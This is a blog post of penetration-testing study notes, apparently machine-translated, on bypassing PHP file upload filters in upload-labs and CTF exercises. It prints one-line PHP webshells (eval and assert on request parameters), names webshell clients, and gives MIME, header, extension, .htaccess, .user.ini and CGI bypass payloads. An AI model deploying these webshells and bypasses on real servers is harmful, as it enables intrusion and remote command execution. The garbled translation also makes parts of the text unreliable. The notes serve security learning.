File upload learning notes

title: file upload learning notes
date: 2021-5-22
tags: penetration test, file upload, basic

Penetration test
File upload

File upload learning notes

2021 / 3 / 6 notes

What is a sentence

In one sentence, Trojan horse "server" (locally stored script Trojan horse file)

It is the execution permission we want to use to upload malicious code to the website of the server

After the statement is triggered, it receives the data uploaded by the intruder through the client and completes the corresponding operation

Benefits: short and powerful

eval It means to execute arbitrary commands as php Language execution
<?php @eval($_GET[a]); ?>    plus@To not echo on the page
<?php eval($_GET[a]); ?>
<?php eval($_POST[a]); ?>
<?php eval($_REQUEST[a]); ?>
<?php eval($_COOKIE[a]); ?>

In a word, the deformation of the Trojan horse

<?php assert($_POST[a]); ?>

Connection tool

  • Chinese ant sword

  • China chopper

Document detection method

  • Client javascript verification (generally only the suffix is verified)

  • Server verification

    • File header content type field verification (image/gif) (MIME type)
    • File content header verification (GIF89a)
    • Suffix blacklist verification
    • Suffix whitelist verification
    • Custom positive side verification
  • WAF equipment verification (depending on different WAF products)


Capture, modify content type: image/jpeg
File header: Forged picture file header (GIF89a)

Client JavaScript verification

Front end JS verification can be bypassed directly
  • Disable JS
  • delete ο nsubmit="return chekFile()"
  • upload-labs Pass-01

Header content type verification

  • Upload the Trojan horse image directly, and then modify the file name to php resolvable suffix

  • Upload the php file, capture the package by BP, and manually modify the content type

  • upload-labs Pass-02

File content header verification

  • Manually forge image file headers, such as GIF89a

  • Insert PHP code into the picture

  • upload-labs Pass-13


//In fact, there will be more and more complete data in the blacklist
$blacklist = array('php','asp','aspx','jsp');
$path = "./uploads";
$type = array_pop(explode('.',$_FILED['myfile']['name']));

if (in_array(strtolower($type),$blacklist)){
    die("File type errer!<br>");
    $file = $path.'/'.$_FILES['myfile']['name'];
        echo 'Success!<br>';
        echo 'Error!<br>';

Blacklist, try various special file names (PHP, PHP, PHP, pht, php5, phtnl, shtml), or add spaces after the extension: D A T A , . , DATA,., DATA,.,,/…, Wait for characters, or try to upload ' htaccess’

Defensive means

Random file name + whitelist suffix

php2	php3	PHP5	phtml	pht(Whether to resolve or not depends on the setting type in the configuration file)
asa	cer	cdx
ascx	ashx	asac
jsp	jspx	jspf

Bypass method

php3	php4	php5
 namely php3 edition	php4 edition	php5 Version PHP File, and downward compatible
upload-labs Pass-03
phtmlphtml yes PHP2 Standard file extension for the program upload-labs Pass-03
::$DATA(windows)Upload file is xxx.php::$DATA Type of file. You can see that the uploaded file is xxx.php::$data . 
Case bypass.Php	.PHtmlupload-labs Pass-05

Content detection

  • Several tag grammars

    <??><?php<?=?><%<script lanague='php'>
    Short label
    Both phrase labels must be in PHP5 After 4.0
    Where phrase label <? > Need to be in PHP Enable configuration short in ini_ open_ Tag can only be used
    <?= Equivalent to <? Echo does not need to open the short tag
    <?= 'whoami'?><?= 'ls'?>
7.0.0	The ASP tags <%, %>, <%=, and the script tag <script language="php"> are ermoved from  php5.4.0	The tag <?= is always available regardless of the short_open_tag ini setting.

Where the ASP tag <%% > requires ASP_ Set tags to On

php less than 7.0 can bypass

<srcipt language='php'>phpinfo();</srcipt>
When<? When bypassed, you can try to use<srcipt lanague='php'>Bypass conditions: PHP Version less than 7.0BUU[Geek challenge 2019]upload
When PHP When filtered, try using short tags<?        ?>Bypass conditions: PHP edition>5.4 And php.ini Open configuration in short_open_tag=1 Hand over your cat map
filter GET POST,Try to use eval($_REQUEST[a]);bypass
filter eval,Try to use assert($_GET[a]);bypass


//.htaccessaddtype application/x-httpd-php .jpg

Upload htaccess jpg can be parsed as PHP. You only need to upload the with shell jpg file is enough

//shell.jpg<script language='php'></script>

Filter file content

/.htaccessaddtype application/x-httpd-php .wuwuphp_value auto_append_file "php://filter/convert.base64-decode/resource=shell.wuwu"
base64.b64encode(b"<?php eval($_GET['c']);?>")
php_value auto_append_file  Will give PHP The contents attached to the file will shell Upload your content to shell.wuwuhtaccess Upload to.htaccess Then visit shell.wuwu that will do/Can only execute commands and cannot connect shell
  • Upload cgi script
  • Options +ExecCGIAddHandler cgi-script  .xx
  • cgi script is best written under Linux and saved as 3.0 xx
  • #!/bin/bashecho "Content_type:text/plain"echo ""cat /flagexit 0

    cig reference documents:

    No filtering.htaccess Consider uploading your blacklist.htaccess File makes jpg The file resolves to PHPupload-labs Pass-04
    When webshell When all characters in are filtered, consider using.htaccess File for base64 Upload after coding
    If you can upload.cgi Documents and.htaccess File, you can consider uploading cgi script    easy_upload


.user.ini is used in nginx/apache/IIS

#Use the conditional server scripting language to use CGI/Fast CGI mode for the PHP server. There should be executable PHP files in the upload directory
.user.ini is actually a PHP that can be "customized" by users ini
*PHP_INI_ Definition of pattern
PHP_INI_USERIt can be in user script (such as ini_set()) or Windows Registry (since PHP5.3) and user.ini
PHP_INI_PERDIRAvailable in PHP ini,. htaccess or httpd Set in conf
PHP_INI_SYSTEMAvailable in PHP Ini or http Set in conf
PHP_INI_ALLCan be set anywhere
auto_append_fileNULLPHP_INI_PERDIRPHP when PHP < = 4.2.3_ INI_ ALL
auto_detect_line_endings"0"PHP_INI_ALLFrom PHP4 Available from 3.0
auto_globals_jit"1"PHP_INI_PERDIRFrom PHP5 Available from 0.0
auto_prepend_fileNULLPHP_INI_PERDIRPHP when PHP < = 4.2.3_ INI_ ALL
auto_prepend_file string
Specifies that a file is automatically included before the file to be executed, similar to that before the file is called. require()Function. and auto_append_file Similar, but included at the end of the file. The method of use is very simple. Write it directly in the user.ini in:
\x00\x00\x8a\x39\x8a\x39auto_perpend_file = cc.jpg
When uploading is not allowed.htaccess Server as nginx And blacklist verification. Please consider uploading.user.ini Condition: Server 
Still updating... Please look forward to

Keywords: security penetration test Information Security

Added by waygood on Tue, 08 Feb 2022 05:31:45 +0200